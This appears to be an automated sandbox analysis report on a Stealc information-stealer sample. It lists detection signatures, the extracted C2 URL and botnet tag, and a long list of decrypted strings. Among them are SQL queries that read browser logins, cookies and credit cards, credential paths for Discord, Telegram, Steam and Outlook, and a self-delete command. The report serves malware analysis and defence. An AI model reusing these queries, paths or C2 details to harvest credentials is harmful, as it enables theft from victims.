
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1545720
MD5: e7e67024404f23389e4052996e08923a
SHA1: 7b695a106607d413d657ba1ca50401b03df2fafd
SHA256: 114e599411e6fa14e2231d45e8ad7ccfffcb068cebe1c93ee98094c8a744cecb
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 4600 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E7E67024404F23389E4052996E08923A)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security

Source | Rule | Description | Author
00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1800359502.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.1756543501.0000000004E30000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 4600 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 4600 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

Source | Rule | Description | Author
0.2.file.exe.20000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-30T21:55:11.459817+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: 0.2.file.exe.20000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: 0.2.file.exe.20000.0.unpack | String decryptor: INSERT_KEY_HERE
Source: 0.2.file.exe.20000.0.unpack | String decryptor: 30
Source: 0.2.file.exe.20000.0.unpack | String decryptor: 11
Source: 0.2.file.exe.20000.0.unpack | String decryptor: 20
Source: 0.2.file.exe.20000.0.unpack | String decryptor: 24
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GetProcAddress
Source: 0.2.file.exe.20000.0.unpack | String decryptor: LoadLibraryA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: lstrcatA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: OpenEventA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: CreateEventA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: CloseHandle
Source: 0.2.file.exe.20000.0.unpack | String decryptor: Sleep
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GetUserDefaultLangID
Source: 0.2.file.exe.20000.0.unpack | String decryptor: VirtualAllocExNuma
Source: 0.2.file.exe.20000.0.unpack | String decryptor: VirtualFree
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GetSystemInfo
Source: 0.2.file.exe.20000.0.unpack | String decryptor: VirtualAlloc
Source: 0.2.file.exe.20000.0.unpack | String decryptor: HeapAlloc
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GetComputerNameA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: lstrcpyA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GetProcessHeap
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GetCurrentProcess
Source: 0.2.file.exe.20000.0.unpack | String decryptor: lstrlenA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: ExitProcess
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GlobalMemoryStatusEx
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GetSystemTime
Source: 0.2.file.exe.20000.0.unpack | String decryptor: SystemTimeToFileTime
Source: 0.2.file.exe.20000.0.unpack | String decryptor: advapi32.dll
Source: 0.2.file.exe.20000.0.unpack | String decryptor: gdi32.dll
Source: 0.2.file.exe.20000.0.unpack | String decryptor: user32.dll
Source: 0.2.file.exe.20000.0.unpack | String decryptor: crypt32.dll
Source: 0.2.file.exe.20000.0.unpack | String decryptor: ntdll.dll
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GetUserNameA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: CreateDCA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GetDeviceCaps
Source: 0.2.file.exe.20000.0.unpack | String decryptor: ReleaseDC
Source: 0.2.file.exe.20000.0.unpack | String decryptor: CryptStringToBinaryA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: sscanf
Source: 0.2.file.exe.20000.0.unpack | String decryptor: VMwareVMware
Source: 0.2.file.exe.20000.0.unpack | String decryptor: HAL9TH
Source: 0.2.file.exe.20000.0.unpack | String decryptor: JohnDoe
Source: 0.2.file.exe.20000.0.unpack | String decryptor: DISPLAY
Source: 0.2.file.exe.20000.0.unpack | String decryptor: %hu/%hu/%hu
Source: 0.2.file.exe.20000.0.unpack | String decryptor: http://185.215.113.206
Source: 0.2.file.exe.20000.0.unpack | String decryptor: bksvnsj
Source: 0.2.file.exe.20000.0.unpack | String decryptor: /6c4adf523b719729.php
Source: 0.2.file.exe.20000.0.unpack | String decryptor: /746f34465cf17784/
Source: 0.2.file.exe.20000.0.unpack | String decryptor: tale
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GetEnvironmentVariableA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GetFileAttributesA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GlobalLock
Source: 0.2.file.exe.20000.0.unpack | String decryptor: HeapFree
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GetFileSize
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GlobalSize
Source: 0.2.file.exe.20000.0.unpack | String decryptor: CreateToolhelp32Snapshot
Source: 0.2.file.exe.20000.0.unpack | String decryptor: IsWow64Process
Source: 0.2.file.exe.20000.0.unpack | String decryptor: Process32Next
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GetLocalTime
Source: 0.2.file.exe.20000.0.unpack | String decryptor: FreeLibrary
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GetTimeZoneInformation
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GetSystemPowerStatus
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GetVolumeInformationA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GetWindowsDirectoryA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: Process32First
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GetLocaleInfoA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GetUserDefaultLocaleName
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GetModuleFileNameA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: DeleteFileA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: FindNextFileA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: LocalFree
Source: 0.2.file.exe.20000.0.unpack | String decryptor: FindClose
Source: 0.2.file.exe.20000.0.unpack | String decryptor: SetEnvironmentVariableA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: LocalAlloc
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GetFileSizeEx
Source: 0.2.file.exe.20000.0.unpack | String decryptor: ReadFile
Source: 0.2.file.exe.20000.0.unpack | String decryptor: SetFilePointer
Source: 0.2.file.exe.20000.0.unpack | String decryptor: WriteFile
Source: 0.2.file.exe.20000.0.unpack | String decryptor: CreateFileA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: FindFirstFileA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: CopyFileA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: VirtualProtect
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GetLastError
Source: 0.2.file.exe.20000.0.unpack | String decryptor: lstrcpynA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: MultiByteToWideChar
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GlobalFree
Source: 0.2.file.exe.20000.0.unpack | String decryptor: WideCharToMultiByte
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GlobalAlloc
Source: 0.2.file.exe.20000.0.unpack | String decryptor: OpenProcess
Source: 0.2.file.exe.20000.0.unpack | String decryptor: TerminateProcess
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GetCurrentProcessId
Source: 0.2.file.exe.20000.0.unpack | String decryptor: gdiplus.dll
Source: 0.2.file.exe.20000.0.unpack | String decryptor: ole32.dll
Source: 0.2.file.exe.20000.0.unpack | String decryptor: bcrypt.dll
Source: 0.2.file.exe.20000.0.unpack | String decryptor: wininet.dll
Source: 0.2.file.exe.20000.0.unpack | String decryptor: shlwapi.dll
Source: 0.2.file.exe.20000.0.unpack | String decryptor: shell32.dll
Source: 0.2.file.exe.20000.0.unpack | String decryptor: psapi.dll
Source: 0.2.file.exe.20000.0.unpack | String decryptor: rstrtmgr.dll
Source: 0.2.file.exe.20000.0.unpack | String decryptor: CreateCompatibleBitmap
Source: 0.2.file.exe.20000.0.unpack | String decryptor: SelectObject
Source: 0.2.file.exe.20000.0.unpack | String decryptor: BitBlt
Source: 0.2.file.exe.20000.0.unpack | String decryptor: DeleteObject
Source: 0.2.file.exe.20000.0.unpack | String decryptor: CreateCompatibleDC
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GdipGetImageEncodersSize
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GdipGetImageEncoders
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GdiplusStartup
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GdiplusShutdown
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GdipSaveImageToStream
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GdipDisposeImage
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GdipFree
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GetHGlobalFromStream
Source: 0.2.file.exe.20000.0.unpack | String decryptor: CreateStreamOnHGlobal
Source: 0.2.file.exe.20000.0.unpack | String decryptor: CoUninitialize
Source: 0.2.file.exe.20000.0.unpack | String decryptor: CoInitialize
Source: 0.2.file.exe.20000.0.unpack | String decryptor: CoCreateInstance
Source: 0.2.file.exe.20000.0.unpack | String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.file.exe.20000.0.unpack | String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.file.exe.20000.0.unpack | String decryptor: BCryptDecrypt
Source: 0.2.file.exe.20000.0.unpack | String decryptor: BCryptSetProperty
Source: 0.2.file.exe.20000.0.unpack | String decryptor: BCryptDestroyKey
Source: 0.2.file.exe.20000.0.unpack | String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GetWindowRect
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GetDesktopWindow
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GetDC
Source: 0.2.file.exe.20000.0.unpack | String decryptor: CloseWindow
Source: 0.2.file.exe.20000.0.unpack | String decryptor: wsprintfA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: EnumDisplayDevicesA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GetKeyboardLayoutList
Source: 0.2.file.exe.20000.0.unpack | String decryptor: CharToOemW
Source: 0.2.file.exe.20000.0.unpack | String decryptor: wsprintfW
Source: 0.2.file.exe.20000.0.unpack | String decryptor: RegQueryValueExA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: RegEnumKeyExA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: RegOpenKeyExA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: RegCloseKey
Source: 0.2.file.exe.20000.0.unpack | String decryptor: RegEnumValueA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: CryptBinaryToStringA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: CryptUnprotectData
Source: 0.2.file.exe.20000.0.unpack | String decryptor: SHGetFolderPathA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: ShellExecuteExA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: InternetOpenUrlA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: InternetConnectA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: InternetCloseHandle
Source: 0.2.file.exe.20000.0.unpack | String decryptor: InternetOpenA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: HttpSendRequestA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: HttpOpenRequestA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: InternetReadFile
Source: 0.2.file.exe.20000.0.unpack | String decryptor: InternetCrackUrlA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: StrCmpCA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: StrStrA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: StrCmpCW
Source: 0.2.file.exe.20000.0.unpack | String decryptor: PathMatchSpecA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: GetModuleFileNameExA
Source: 0.2.file.exe.20000.0.unpack | String decryptor: RmStartSession
Source: 0.2.file.exe.20000.0.unpack | String decryptor: RmRegisterResources
Source: 0.2.file.exe.20000.0.unpack | String decryptor: RmGetList
Source: 0.2.file.exe.20000.0.unpack | String decryptor: RmEndSession
Source: 0.2.file.exe.20000.0.unpack | String decryptor: sqlite3_open
Source: 0.2.file.exe.20000.0.unpack | String decryptor: sqlite3_prepare_v2
Source: 0.2.file.exe.20000.0.unpack | String decryptor: sqlite3_step
Source: 0.2.file.exe.20000.0.unpack | String decryptor: sqlite3_column_text
Source: 0.2.file.exe.20000.0.unpack | String decryptor: sqlite3_finalize
Source: 0.2.file.exe.20000.0.unpack | String decryptor: sqlite3_close
Source: 0.2.file.exe.20000.0.unpack | String decryptor: sqlite3_column_bytes
Source: 0.2.file.exe.20000.0.unpack | String decryptor: sqlite3_column_blob
Source: 0.2.file.exe.20000.0.unpack | String decryptor: encrypted_key
Source: 0.2.file.exe.20000.0.unpack | String decryptor: PATH
Source: 0.2.file.exe.20000.0.unpack | String decryptor: C:\ProgramData\nss3.dll
Source: 0.2.file.exe.20000.0.unpack | String decryptor: NSS_Init
Source: 0.2.file.exe.20000.0.unpack | String decryptor: NSS_Shutdown
Source: 0.2.file.exe.20000.0.unpack | String decryptor: PK11_GetInternalKeySlot
Source: 0.2.file.exe.20000.0.unpack | String decryptor: PK11_FreeSlot
Source: 0.2.file.exe.20000.0.unpack | String decryptor: PK11_Authenticate
Source: 0.2.file.exe.20000.0.unpack | String decryptor: PK11SDR_Decrypt
Source: 0.2.file.exe.20000.0.unpack | String decryptor: C:\ProgramData\
Source: 0.2.file.exe.20000.0.unpack | String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 0.2.file.exe.20000.0.unpack | String decryptor: browser:
Source: 0.2.file.exe.20000.0.unpack | String decryptor: profile:
Source: 0.2.file.exe.20000.0.unpack | String decryptor: url:
Source: 0.2.file.exe.20000.0.unpack | String decryptor: login:
Source: 0.2.file.exe.20000.0.unpack | String decryptor: password:
Source: 0.2.file.exe.20000.0.unpack | String decryptor: Opera
Source: 0.2.file.exe.20000.0.unpack | String decryptor: OperaGX
Source: 0.2.file.exe.20000.0.unpack | String decryptor: Network
Source: 0.2.file.exe.20000.0.unpack | String decryptor: cookies
Source: 0.2.file.exe.20000.0.unpack | String decryptor: .txt
Source: 0.2.file.exe.20000.0.unpack | String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 0.2.file.exe.20000.0.unpack | String decryptor: TRUE
Source: 0.2.file.exe.20000.0.unpack | String decryptor: FALSE
Source: 0.2.file.exe.20000.0.unpack | String decryptor: autofill
Source: 0.2.file.exe.20000.0.unpack | String decryptor: SELECT name, value FROM autofill
Source: 0.2.file.exe.20000.0.unpack | String decryptor: history
Source: 0.2.file.exe.20000.0.unpack | String decryptor: SELECT url FROM urls LIMIT 1000
Source: 0.2.file.exe.20000.0.unpack | String decryptor: cc
Source: 0.2.file.exe.20000.0.unpack | String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 0.2.file.exe.20000.0.unpack | String decryptor: name:
Source: 0.2.file.exe.20000.0.unpack | String decryptor: month:
Source: 0.2.file.exe.20000.0.unpack | String decryptor: year:
Source: 0.2.file.exe.20000.0.unpack | String decryptor: card:
Source: 0.2.file.exe.20000.0.unpack | String decryptor: Cookies
Source: 0.2.file.exe.20000.0.unpack | String decryptor: Login Data
Source: 0.2.file.exe.20000.0.unpack | String decryptor: Web Data
Source: 0.2.file.exe.20000.0.unpack | String decryptor: History
Source: 0.2.file.exe.20000.0.unpack | String decryptor: logins.json
Source: 0.2.file.exe.20000.0.unpack | String decryptor: formSubmitURL
Source: 0.2.file.exe.20000.0.unpack | String decryptor: usernameField
Source: 0.2.file.exe.20000.0.unpack | String decryptor: encryptedUsername
Source: 0.2.file.exe.20000.0.unpack | String decryptor: encryptedPassword
Source: 0.2.file.exe.20000.0.unpack | String decryptor: guid
Source: 0.2.file.exe.20000.0.unpack | String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 0.2.file.exe.20000.0.unpack | String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 0.2.file.exe.20000.0.unpack | String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 0.2.file.exe.20000.0.unpack | String decryptor: cookies.sqlite
Source: 0.2.file.exe.20000.0.unpack | String decryptor: formhistory.sqlite
Source: 0.2.file.exe.20000.0.unpack | String decryptor: places.sqlite
Source: 0.2.file.exe.20000.0.unpack | String decryptor: plugins
Source: 0.2.file.exe.20000.0.unpack | String decryptor: Local Extension Settings
Source: 0.2.file.exe.20000.0.unpack | String decryptor: Sync Extension Settings
Source: 0.2.file.exe.20000.0.unpack | String decryptor: IndexedDB
Source: 0.2.file.exe.20000.0.unpack | String decryptor: Opera Stable
Source: 0.2.file.exe.20000.0.unpack | String decryptor: Opera GX Stable
Source: 0.2.file.exe.20000.0.unpack | String decryptor: CURRENT
Source: 0.2.file.exe.20000.0.unpack | String decryptor: chrome-extension_
Source: 0.2.file.exe.20000.0.unpack | String decryptor: _0.indexeddb.leveldb
Source: 0.2.file.exe.20000.0.unpack | String decryptor: Local State
Source: 0.2.file.exe.20000.0.unpack | String decryptor: profiles.ini
Source: 0.2.file.exe.20000.0.unpack | String decryptor: chrome
Source: 0.2.file.exe.20000.0.unpack | String decryptor: opera
Source: 0.2.file.exe.20000.0.unpack | String decryptor: firefox
Source: 0.2.file.exe.20000.0.unpack | String decryptor: wallets
Source: 0.2.file.exe.20000.0.unpack | String decryptor: %08lX%04lX%lu
Source: 0.2.file.exe.20000.0.unpack | String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0.2.file.exe.20000.0.unpack | String decryptor: ProductName
Source: 0.2.file.exe.20000.0.unpack | String decryptor: x32
Source: 0.2.file.exe.20000.0.unpack | String decryptor: x64
Source: 0.2.file.exe.20000.0.unpack | String decryptor: %d/%d/%d %d:%d:%d
Source: 0.2.file.exe.20000.0.unpack | String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 0.2.file.exe.20000.0.unpack | String decryptor: ProcessorNameString
Source: 0.2.file.exe.20000.0.unpack | String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 0.2.file.exe.20000.0.unpack | String decryptor: DisplayName
Source: 0.2.file.exe.20000.0.unpack | String decryptor: DisplayVersion
Source: 0.2.file.exe.20000.0.unpack | String decryptor: Network Info:
Source: 0.2.file.exe.20000.0.unpack | String decryptor: - IP: IP?
Source: 0.2.file.exe.20000.0.unpack | String decryptor: - Country: ISO?
Source: 0.2.file.exe.20000.0.unpack | String decryptor: System Summary:
Source: 0.2.file.exe.20000.0.unpack | String decryptor: - HWID:
Source: 0.2.file.exe.20000.0.unpack | String decryptor: - OS:
Source: 0.2.file.exe.20000.0.unpack | String decryptor: - Architecture:
Source: 0.2.file.exe.20000.0.unpack | String decryptor: - UserName:
Source: 0.2.file.exe.20000.0.unpack | String decryptor: - Computer Name:
Source: 0.2.file.exe.20000.0.unpack | String decryptor: - Local Time:
Source: 0.2.file.exe.20000.0.unpack | String decryptor: - UTC:
Source: 0.2.file.exe.20000.0.unpack | String decryptor: - Language:
Source: 0.2.file.exe.20000.0.unpack | String decryptor: - Keyboards:
Source: 0.2.file.exe.20000.0.unpack | String decryptor: - Laptop:
Source: 0.2.file.exe.20000.0.unpack | String decryptor: - Running Path:
Source: 0.2.file.exe.20000.0.unpack | String decryptor: - CPU:
Source: 0.2.file.exe.20000.0.unpack | String decryptor: - Threads:
Source: 0.2.file.exe.20000.0.unpack | String decryptor: - Cores:
Source: 0.2.file.exe.20000.0.unpack | String decryptor: - RAM:
Source: 0.2.file.exe.20000.0.unpack | String decryptor: - Display Resolution:
Source: 0.2.file.exe.20000.0.unpack | String decryptor: - GPU:
Source: 0.2.file.exe.20000.0.unpack | String decryptor: User Agents:
Source: 0.2.file.exe.20000.0.unpack | String decryptor: Installed Apps:
Source: 0.2.file.exe.20000.0.unpack | String decryptor: All Users:
Source: 0.2.file.exe.20000.0.unpack | String decryptor: Current User:
Source: 0.2.file.exe.20000.0.unpack | String decryptor: Process List:
Source: 0.2.file.exe.20000.0.unpack | String decryptor: system_info.txt
Source: 0.2.file.exe.20000.0.unpack | String decryptor: freebl3.dll
Source: 0.2.file.exe.20000.0.unpack | String decryptor: mozglue.dll
Source: 0.2.file.exe.20000.0.unpack | String decryptor: msvcp140.dll
Source: 0.2.file.exe.20000.0.unpack | String decryptor: nss3.dll
Source: 0.2.file.exe.20000.0.unpack | String decryptor: softokn3.dll
Source: 0.2.file.exe.20000.0.unpack | String decryptor: vcruntime140.dll
Source: 0.2.file.exe.20000.0.unpack | String decryptor: \Temp\
Source: 0.2.file.exe.20000.0.unpack | String decryptor: .exe
Source: 0.2.file.exe.20000.0.unpack | String decryptor: runas
Source: 0.2.file.exe.20000.0.unpack | String decryptor: open
Source: 0.2.file.exe.20000.0.unpack | String decryptor: /c start
Source: 0.2.file.exe.20000.0.unpack | String decryptor: %DESKTOP%
Source: 0.2.file.exe.20000.0.unpack | String decryptor: %APPDATA%
Source: 0.2.file.exe.20000.0.unpack | String decryptor: %LOCALAPPDATA%
Source: 0.2.file.exe.20000.0.unpack | String decryptor: %USERPROFILE%
Source: 0.2.file.exe.20000.0.unpack | String decryptor: %DOCUMENTS%
Source: 0.2.file.exe.20000.0.unpack | String decryptor: %PROGRAMFILES%
Source: 0.2.file.exe.20000.0.unpack | String decryptor: %PROGRAMFILES_86%
Source: 0.2.file.exe.20000.0.unpack | String decryptor: %RECENT%
Source: 0.2.file.exe.20000.0.unpack | String decryptor: *.lnk
Source: 0.2.file.exe.20000.0.unpack | String decryptor: files
Source: 0.2.file.exe.20000.0.unpack | String decryptor: \discord\
Source: 0.2.file.exe.20000.0.unpack | String decryptor: \Local Storage\leveldb\CURRENT
Source: 0.2.file.exe.20000.0.unpack | String decryptor: \Local Storage\leveldb
Source: 0.2.file.exe.20000.0.unpack | String decryptor: \Telegram Desktop\
Source: 0.2.file.exe.20000.0.unpack | String decryptor: key_datas
Source: 0.2.file.exe.20000.0.unpack | String decryptor: D877F783D5D3EF8C*
Source: 0.2.file.exe.20000.0.unpack | String decryptor: map*
Source: 0.2.file.exe.20000.0.unpack | String decryptor: A7FDF864FBC10B77*
Source: 0.2.file.exe.20000.0.unpack | String decryptor: A92DAA6EA6F891F2*
Source: 0.2.file.exe.20000.0.unpack | String decryptor: F8806DD0C461824F*
Source: 0.2.file.exe.20000.0.unpack | String decryptor: Telegram
Source: 0.2.file.exe.20000.0.unpack | String decryptor: Tox
Source: 0.2.file.exe.20000.0.unpack | String decryptor: *.tox
Source: 0.2.file.exe.20000.0.unpack | String decryptor: *.ini
Source: 0.2.file.exe.20000.0.unpack | String decryptor: Password
Source: 0.2.file.exe.20000.0.unpack | String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.20000.0.unpack | String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.20000.0.unpack | String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.20000.0.unpack | String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.20000.0.unpack | String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.20000.0.unpack | String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.20000.0.unpack | String decryptor: 00000001
Source: 0.2.file.exe.20000.0.unpack | String decryptor: 00000002
Source: 0.2.file.exe.20000.0.unpack | String decryptor: 00000003
Source: 0.2.file.exe.20000.0.unpack | String decryptor: 00000004
Source: 0.2.file.exe.20000.0.unpack | String decryptor: \Outlook\accounts.txt
Source: 0.2.file.exe.20000.0.unpack | String decryptor: Pidgin
Source: 0.2.file.exe.20000.0.unpack | String decryptor: \.purple\
Source: 0.2.file.exe.20000.0.unpack | String decryptor: accounts.xml
Source: 0.2.file.exe.20000.0.unpack | String decryptor: dQw4w9WgXcQ
Source: 0.2.file.exe.20000.0.unpack | String decryptor: token:
Source: 0.2.file.exe.20000.0.unpack | String decryptor: Software\Valve\Steam
Source: 0.2.file.exe.20000.0.unpack | String decryptor: SteamPath
Source: 0.2.file.exe.20000.0.unpack | String decryptor: \config\
Source: 0.2.file.exe.20000.0.unpack | String decryptor: ssfn*
Source: 0.2.file.exe.20000.0.unpack | String decryptor: config.vdf
Source: 0.2.file.exe.20000.0.unpack | String decryptor: DialogConfig.vdf
Source: 0.2.file.exe.20000.0.unpack | String decryptor: DialogConfigOverlay*.vdf
Source: 0.2.file.exe.20000.0.unpack | String decryptor: libraryfolders.vdf
Source: 0.2.file.exe.20000.0.unpack | String decryptor: loginusers.vdf
Source: 0.2.file.exe.20000.0.unpack | String decryptor: \Steam\
Source: 0.2.file.exe.20000.0.unpack | String decryptor: sqlite3.dll
                Source: 0.2.file.exe.20000.0.unpackString decryptor: browsers
                Source: 0.2.file.exe.20000.0.unpackString decryptor: done
                Source: 0.2.file.exe.20000.0.unpackString decryptor: soft
                Source: 0.2.file.exe.20000.0.unpackString decryptor: \Discord\tokens.txt
                Source: 0.2.file.exe.20000.0.unpackString decryptor: /c timeout /t 5 & del /f /q "
                Source: 0.2.file.exe.20000.0.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                Source: 0.2.file.exe.20000.0.unpackString decryptor: C:\Windows\system32\cmd.exe
                Source: 0.2.file.exe.20000.0.unpackString decryptor: https
